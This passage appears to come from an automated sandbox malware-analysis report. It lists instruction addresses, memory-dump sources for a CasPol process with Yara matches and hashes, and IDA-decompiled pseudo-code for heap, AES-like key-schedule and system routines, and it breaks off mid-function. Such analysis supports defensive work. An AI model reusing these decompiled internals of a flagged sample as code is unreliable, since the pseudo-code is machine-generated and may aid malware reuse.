                                                                        0x00422a09
                                                                        0x00422cb2
                                                                        0x00422cb2
                                                                        0x00422cb8
                                                                        0x00422cbe
                                                                        0x00422cc5
                                                                        0x00422ccb
                                                                        0x00422cd1
                                                                        0x00422cd7
                                                                        0x00000000
                                                                        0x00422a03
                                                                        0x00422a03
                                                                        0x00422a03
                                                                        0x00422a03
                                                                        0x00422a03
                                                                        0x00422a03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00422a11
                                                                        0x00422a17
                                                                        0x00422a1d
                                                                        0x00422a1d
                                                                        0x00422a25
                                                                        0x00422a2b
                                                                        0x00422a2b
                                                                        0x00422a33
                                                                        0x00422a3a
                                                                        0x00422a3b
                                                                        0x00422a41
                                                                        0x00422a47
                                                                        0x00422a4a
                                                                        0x00422a50
                                                                        0x00422a56
                                                                        0x00422a5c
                                                                        0x00422a61
                                                                        0x00422a67
                                                                        0x00422a6d
                                                                        0x00422a74
                                                                        0x00422a7b
                                                                        0x00422a7b
                                                                        0x00422a83
                                                                        0x00422a8d
                                                                        0x00422aa0
                                                                        0x00422aa7
                                                                        0x00422aa9
                                                                        0x00422aa9
                                                                        0x00422abb
                                                                        0x00422abc
                                                                        0x00422abd
                                                                        0x00422ac9
                                                                        0x00422ad0
                                                                        0x00422ad7
                                                                        0x00422ade
                                                                        0x00422aec
                                                                        0x00422af2
                                                                        0x00422af3
                                                                        0x00422b00
                                                                        0x00422b07
                                                                        0x00422b0e
                                                                        0x00422b14
                                                                        0x00422b20
                                                                        0x00422b27
                                                                        0x00422b2a
                                                                        0x00422b30
                                                                        0x00422b3c
                                                                        0x00422b48
                                                                        0x00422b54
                                                                        0x00422b5d
                                                                        0x00422b63
                                                                        0x00422b66
                                                                        0x00422b6d
                                                                        0x00422b70
                                                                        0x00422b76
                                                                        0x00422b7c
                                                                        0x00422b7f
                                                                        0x00422b86
                                                                        0x00422b8c
                                                                        0x00422b93
                                                                        0x00422b94
                                                                        0x00422ba0
                                                                        0x00422ba6
                                                                        0x00422bad
                                                                        0x00422bb3
                                                                        0x00422bc0
                                                                        0x00422bc6
                                                                        0x00422bd1
                                                                        0x00422bd7
                                                                        0x00422bdd
                                                                        0x00422be9
                                                                        0x00422bf0
                                                                        0x00422bf7
                                                                        0x00422cdd
                                                                        0x00422cdd
                                                                        0x00422ce4
                                                                        0x00422cf6
                                                                        0x00422cfd
                                                                        0x00422d04
                                                                        0x00422d0d
                                                                        0x00422d13
                                                                        0x00422d14
                                                                        0x00422d1a
                                                                        0x00422d26
                                                                        0x00422d35
                                                                        0x00422d3c
                                                                        0x00422d42
                                                                        0x00422d48
                                                                        0x00422d4e
                                                                        0x00422d4e
                                                                        0x00422d4e
                                                                        0x00422d54
                                                                        0x00422d60
                                                                        0x00422d67
                                                                        0x00422d79
                                                                        0x00422d7b
                                                                        0x00422d7b
                                                                        0x00422cd7

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1255c3b567cb2f402ac3d907e62502bd845f7c6f8968ebe21c9db83a3cc6eed2
                                                                        • Instruction ID: a4e25e313fca7d11b0d8e206a134e9c9b3fc2bd5a26cd2836586e68674f23310
                                                                        • Opcode Fuzzy Hash: 1255c3b567cb2f402ac3d907e62502bd845f7c6f8968ebe21c9db83a3cc6eed2
                                                                        • Instruction Fuzzy Hash: 4181013284C7D1DFEB11DF78E89A6453F71F746320B48038EC9A15B6E2D3A4256ACB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0145CB4F Relevance: .2, Instructions: 171COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E0145CB4F(signed int __ecx) {
				signed int _v8;
				unsigned int* _v12;
				intOrPtr* _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				signed int _t57;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t79;
				unsigned int* _t80;
				signed int _t82;
				signed int* _t84;
				signed char _t88;
				signed char _t93;
				signed int _t100;
				signed int _t103;
				signed short _t104;
				unsigned int _t107;
				unsigned int _t111;
				signed int _t114;
				signed short* _t115;
				void* _t118;
				signed short* _t119;
				signed int _t120;

				_t120 = __ecx;
				_v12 = 0;
				_t118 = __ecx + 0xc0;
				_t79 =  *((intOrPtr*)(_t118 + 4));
				if(_t118 == _t79) {
					_t80 = 0;
					L38:
					return _t80;
				} else {
					goto L1;
				}
				do {
					L1:
					_t119 = _t79 - 8;
					_v16 = _t79;
					if( *(_t120 + 0x4c) != 0) {
						_t107 =  *(_t120 + 0x50) ^  *_t119;
						 *_t119 = _t107;
						_t88 = _t107 >> 0x00000010 ^ _t107 >> 0x00000008 ^ _t107;
						_t123 = _t107 >> 0x18 - _t88;
						if(_t107 >> 0x18 != _t88) {
							E0146FA2B(_t79, _t120, _t119, _t119, _t120, _t123, _t88);
						}
					}
					_t82 =  *_t119 & 0x0000ffff;
					_t79 =  *_t79;
					_v20 = _t82;
					_v8 = _t82;
					if((_t119[1] & 0x00000008) == 0) {
						_t84 = E013D99BF(_t120, _t119,  &_v8, 1);
						__eflags = _v8 - _v20;
						if(_v8 == _v20) {
							_t103 = _v12;
							__eflags = _t103;
							if(_t103 == 0) {
								L29:
								_v12 = _t84;
								L30:
								__eflags =  *(_t120 + 0x4c);
								if(__eflags != 0) {
									_t84[0] = _t84[0] ^ _t84[0] ^  *_t84;
									 *_t84 =  *_t84 ^  *(_t120 + 0x50);
									__eflags =  *_t84;
								}
								goto L32;
							}
							__eflags =  *_t103 -  *_t84;
							if( *_t103 >=  *_t84) {
								goto L30;
							}
							goto L29;
						}
						__eflags = _t84 - _t119;
						if(_t84 == _t119) {
							L24:
							_push(1);
							_push(_v8);
							_t115 = _t84;
							L25:
							E013DA309(_t120, _t115);
							L26:
							_t79 =  *((intOrPtr*)(_t120 + 0xc4));
							goto L32;
						}
						__eflags =  *_t84 - 0x200;
						if( *_t84 < 0x200) {
							L23:
							E013DA830(_t120, _t84, _v8);
							goto L26;
						}
						__eflags =  *((intOrPtr*)(_t120 + 0x54)) - _t84[1];
						if( *((intOrPtr*)(_t120 + 0x54)) == _t84[1]) {
							goto L24;
						}
						goto L23;
					}
					_t104 = _t119[6];
					_t55 =  *(_t79 + 4);
					_v8 = _t104;
					if( *_t104 != _t55) {
						L18:
						_push(_t82);
						_push( *_t104);
						E0147A80D(_t120, 0xd, _v16, _t55);
						goto L26;
					}
					_t82 = _v20;
					if( *_t104 != _v16) {
						goto L18;
					}
					 *((intOrPtr*)(_t120 + 0x74)) =  *((intOrPtr*)(_t120 + 0x74)) - _t82;
					_t114 =  *(_t120 + 0xb4);
					if(_t114 == 0) {
						L14:
						_t57 = _v8;
						 *_t57 = _t79;
						 *(_t79 + 4) = _t57;
						if((_t119[1] & 0x00000008) != 0) {
							E013DA229(_t120, _t119);
						}
						_t115 = _t119;
						_push(1);
						_push( *_t119 & 0x0000ffff);
						goto L25;
					}
					_t100 =  *_t119 & 0x0000ffff;
					while(_t100 >=  *((intOrPtr*)(_t114 + 4))) {
						_t61 =  *_t114;
						__eflags = _t61;
						if(_t61 == 0) {
							_t63 =  *((intOrPtr*)(_t114 + 4)) - 1;
							L13:
							E013DBC04(_t120, _t114, 1, _v16, _t63, _t100);
							goto L14;
						}
						_t114 = _t61;
					}
					_t63 = _t100;
					goto L13;
					L32:
				} while (_t120 + 0xc0 != _t79);
				_t80 = _v12;
				if(_t80 != 0 &&  *(_t120 + 0x4c) != 0) {
					_t111 =  *(_t120 + 0x50) ^  *_t80;
					 *_t80 = _t111;
					_t93 = _t111 >> 0x00000010 ^ _t111 >> 0x00000008 ^ _t111;
					_t133 = _t111 >> 0x18 - _t93;
					if(_t111 >> 0x18 != _t93) {
						E0146FA2B(_t80, _t120, _t80, _t119, _t120, _t133, _t93);
					}
				}
				goto L38;
			}































                                                                        0x0145cb59
                                                                        0x0145cb5e
                                                                        0x0145cb61
                                                                        0x0145cb67
                                                                        0x0145cb6c
                                                                        0x0145ccf9
                                                                        0x0145ccfd
                                                                        0x0145cd03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0145cb72
                                                                        0x0145cb72
                                                                        0x0145cb76
                                                                        0x0145cb79
                                                                        0x0145cb7c
                                                                        0x0145cb81
                                                                        0x0145cb85
                                                                        0x0145cb91
                                                                        0x0145cb96
                                                                        0x0145cb98
                                                                        0x0145cb9f
                                                                        0x0145cb9f
                                                                        0x0145cb98
                                                                        0x0145cba8
                                                                        0x0145cbab
                                                                        0x0145cbad
                                                                        0x0145cbb0
                                                                        0x0145cbb3
                                                                        0x0145cc48
                                                                        0x0145cc4d
                                                                        0x0145cc50
                                                                        0x0145cc8e
                                                                        0x0145cc91
                                                                        0x0145cc93
                                                                        0x0145cc9d
                                                                        0x0145cc9d
                                                                        0x0145cca0
                                                                        0x0145cca0
                                                                        0x0145cca4
                                                                        0x0145ccae
                                                                        0x0145ccb4
                                                                        0x0145ccb4
                                                                        0x0145ccb4
                                                                        0x00000000
                                                                        0x0145cca4
                                                                        0x0145cc98
                                                                        0x0145cc9b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0145cc9b
                                                                        0x0145cc52
                                                                        0x0145cc54
                                                                        0x0145cc78
                                                                        0x0145cc78
                                                                        0x0145cc7a
                                                                        0x0145cc7d
                                                                        0x0145cc7f
                                                                        0x0145cc81
                                                                        0x0145cc86
                                                                        0x0145cc86
                                                                        0x00000000
                                                                        0x0145cc86
                                                                        0x0145cc5b
                                                                        0x0145cc5e
                                                                        0x0145cc6a
                                                                        0x0145cc71
                                                                        0x00000000
                                                                        0x0145cc71
                                                                        0x0145cc64
                                                                        0x0145cc68
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0145cc68
                                                                        0x0145cbb9
                                                                        0x0145cbbc
                                                                        0x0145cbbf
                                                                        0x0145cbc4
                                                                        0x0145cc26
                                                                        0x0145cc26
                                                                        0x0145cc27
                                                                        0x0145cc32
                                                                        0x00000000
                                                                        0x0145cc32
                                                                        0x0145cbcb
                                                                        0x0145cbce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0145cbd0
                                                                        0x0145cbd3
                                                                        0x0145cbdb
                                                                        0x0145cbff
                                                                        0x0145cbff
                                                                        0x0145cc02
                                                                        0x0145cc04
                                                                        0x0145cc0b
                                                                        0x0145cc11
                                                                        0x0145cc11
                                                                        0x0145cc19
                                                                        0x0145cc1b
                                                                        0x0145cc1d
                                                                        0x00000000
                                                                        0x0145cc1d
                                                                        0x0145cbdd
                                                                        0x0145cbea
                                                                        0x0145cbe2
                                                                        0x0145cbe4
                                                                        0x0145cbe6
                                                                        0x0145cc23
                                                                        0x0145cbf1
                                                                        0x0145cbfa
                                                                        0x00000000
                                                                        0x0145cbfa
                                                                        0x0145cbe8
                                                                        0x0145cbe8
                                                                        0x0145cbef
                                                                        0x00000000
                                                                        0x0145ccb6
                                                                        0x0145ccbc
                                                                        0x0145ccc4
                                                                        0x0145ccc9
                                                                        0x0145ccd4
                                                                        0x0145ccd8
                                                                        0x0145cce4
                                                                        0x0145cce9
                                                                        0x0145cceb
                                                                        0x0145ccf2
                                                                        0x0145ccf2
                                                                        0x0145cceb
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
                                                                        • Instruction ID: f4f23bd14c9f336c2723e94e554d3ebe6f3ce20dee08d2240a159a597cd8613e
                                                                        • Opcode Fuzzy Hash: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
                                                                        • Instruction Fuzzy Hash: 6951EE307007019BDB26DF29C4C0A6BBBFAFF89304F24815ED9469B362D771A942CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004055AA Relevance: .2, Instructions: 166COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 62%
                                                                        			E004055AA(void* __ecx, void* __edx, void* __fp0, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				void* _v117;
				signed int _t67;
				intOrPtr _t72;
				signed int* _t87;
				signed int _t100;
				signed int _t102;
				signed int _t112;
				signed int _t114;
				signed int* _t118;
				signed int _t135;
				signed int _t137;
				signed int _t141;
				void* _t142;
				signed int _t162;
				signed int* _t184;

				asm("aaa");
				ds = _t142;
				asm("sti");
				_push(_t142);
				_t87 = _a8;
				_t118 = _a4;
				_push(_t142);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t118 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
				_t67 =  &(_t118[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t118[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
				if(_a12 != 0x100) {
					L5:
					return _t67 | 0xffffffff;
				} else {
					_t184 = _a4;
					_t72 = 0;
					_a12 = 0;
					while(1) {
						_t162 =  *(_t67 + 0x18);
						_t100 = ( *(_t184 + 4 + (_t162 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t184 + _t72 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t184 + 4 + (_t162 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 5 + (_t162 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t184 + 4 + (_t162 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
						_t135 =  *_t67 ^ _t100;
						 *(_t67 + 0x1c) = _t100;
						_t102 =  *(_t67 + 4) ^ _t135;
						 *(_t67 + 0x20) = _t135;
						_t137 =  *(_t67 + 8) ^ _t102;
						 *(_t67 + 0x24) = _t102;
						 *(_t67 + 0x28) = _t137;
						if(_t72 == 6) {
							break;
						}
						_t112 = ( *(_t184 + 4 + (_t137 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t184 + 4 + (_t137 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 4 + (_t137 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t184 + 5 + (_t137 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
						_t141 =  *(_t67 + 0x10) ^ _t112;
						 *(_t67 + 0x2c) = _t112;
						_t114 =  *(_t67 + 0x14) ^ _t141;
						 *(_t67 + 0x34) = _t114;
						_t72 = _a12 + 1;
						 *(_t67 + 0x30) = _t141;
						 *(_t67 + 0x38) = _t114 ^ _t162;
						_t67 = _t67 + 0x20;
						_a12 = _t72;
						if(_t72 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}


















                                                                        0x004055ab
                                                                        0x004055ac
                                                                        0x004055ae
                                                                        0x004055af
                                                                        0x004055b6
                                                                        0x004055bb
                                                                        0x004055c0
                                                                        0x004055c3
                                                                        0x004055cc
                                                                        0x004055d6
                                                                        0x004055dd
                                                                        0x004055e6
                                                                        0x004055f1
                                                                        0x004055f9
                                                                        0x00405602
                                                                        0x0040560d
                                                                        0x00405613
                                                                        0x00405618
                                                                        0x00405621
                                                                        0x0040562c
                                                                        0x00405634
                                                                        0x0040563d
                                                                        0x00405648
                                                                        0x00405650
                                                                        0x00405659
                                                                        0x00405664
                                                                        0x0040566c
                                                                        0x00405675
                                                                        0x00405680
                                                                        0x00405688
                                                                        0x00405691
                                                                        0x004056a3
                                                                        0x004056a6
                                                                        0x004057c0
                                                                        0x004057c7
                                                                        0x004056ac
                                                                        0x004056ac
                                                                        0x004056af
                                                                        0x004056b1
                                                                        0x004056b4
                                                                        0x004056b4
                                                                        0x00405719
                                                                        0x0040571e
                                                                        0x00405720
                                                                        0x00405726
                                                                        0x00405728
                                                                        0x0040572e
                                                                        0x00405730
                                                                        0x00405733
                                                                        0x00405739
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405795
                                                                        0x0040579b
                                                                        0x0040579d
                                                                        0x004057a3
                                                                        0x004057a5
                                                                        0x004057aa
                                                                        0x004057ab
                                                                        0x004057ae
                                                                        0x004057b1
                                                                        0x004057b4
                                                                        0x004057ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004057ba
                                                                        0x004057d1
                                                                        0x004057d1
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78470efef8b83ad90903656706623e77d4caeb47580477f083feeb57f9351569
                                                                        • Instruction ID: d65976331063c118bc800cb770b3bfde48423cf13a1b4923c01ad9f9c739599f
                                                                        • Opcode Fuzzy Hash: 78470efef8b83ad90903656706623e77d4caeb47580477f083feeb57f9351569
                                                                        • Instruction Fuzzy Hash: 8951A2B3E14A214BD318CE09CC40672B792FFD8312B5B81BEDD199B357CA34A9529A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004055B3 Relevance: .2, Instructions: 165COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E004055B3(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                        0x004055b6
                                                                        0x004055bb
                                                                        0x004055c3
                                                                        0x004055cc
                                                                        0x004055d6
                                                                        0x004055dd
                                                                        0x004055e6
                                                                        0x004055f1
                                                                        0x004055f9
                                                                        0x00405602
                                                                        0x0040560d
                                                                        0x00405613
                                                                        0x00405618
                                                                        0x00405621
                                                                        0x0040562c
                                                                        0x00405634
                                                                        0x0040563d
                                                                        0x00405648
                                                                        0x00405650
                                                                        0x00405659
                                                                        0x00405664
                                                                        0x0040566c
                                                                        0x00405675
                                                                        0x00405680
                                                                        0x00405688
                                                                        0x00405691
                                                                        0x004056a3
                                                                        0x004056a6
                                                                        0x004057c2
                                                                        0x004057c7
                                                                        0x004056ac
                                                                        0x004056ac
                                                                        0x004056af
                                                                        0x004056b1
                                                                        0x004056b4
                                                                        0x004056b4
                                                                        0x00405719
                                                                        0x0040571e
                                                                        0x00405720
                                                                        0x00405726
                                                                        0x00405728
                                                                        0x0040572e
                                                                        0x00405730
                                                                        0x00405733
                                                                        0x00405739
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405795
                                                                        0x0040579b
                                                                        0x0040579d
                                                                        0x004057a3
                                                                        0x004057a5
                                                                        0x004057aa
                                                                        0x004057ab
                                                                        0x004057ae
                                                                        0x004057b1
                                                                        0x004057b4
                                                                        0x004057ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004057ba
                                                                        0x004057d1
                                                                        0x004057d1
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                        • Instruction ID: 34d557361ff3680d8db281d09d546e6e6a82bb9cf3e5a1677a7a0fcf1fca399d
                                                                        • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                        • Instruction Fuzzy Hash: 385174B3E14A214BD3188E09CC40636B792FFD8312B5F81BEDD199B357CE74E9519A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B52A5 Relevance: .2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E013B52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E013CEEF0(0x14a79a0);
					_t104 =  *0x14a8210; // 0xf52c48
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E013CEB70(_t93, 0x14a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E013F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E013CEEF0(0x14a79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E013CEB70(0, 0x14a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xf52c55
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E013EF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E013CEEF0(0x14a79a0);
									__eflags =  *0x14a8210 - _t104; // 0xf52c48
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x14a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01434888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E013CEB70(_t95, 0x14a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013F95D0();
											L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013F95D0();
											L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E013CEB70(_t93, 0x14a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E013F95D0();
										L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E013F95D0();
										L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E013EF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
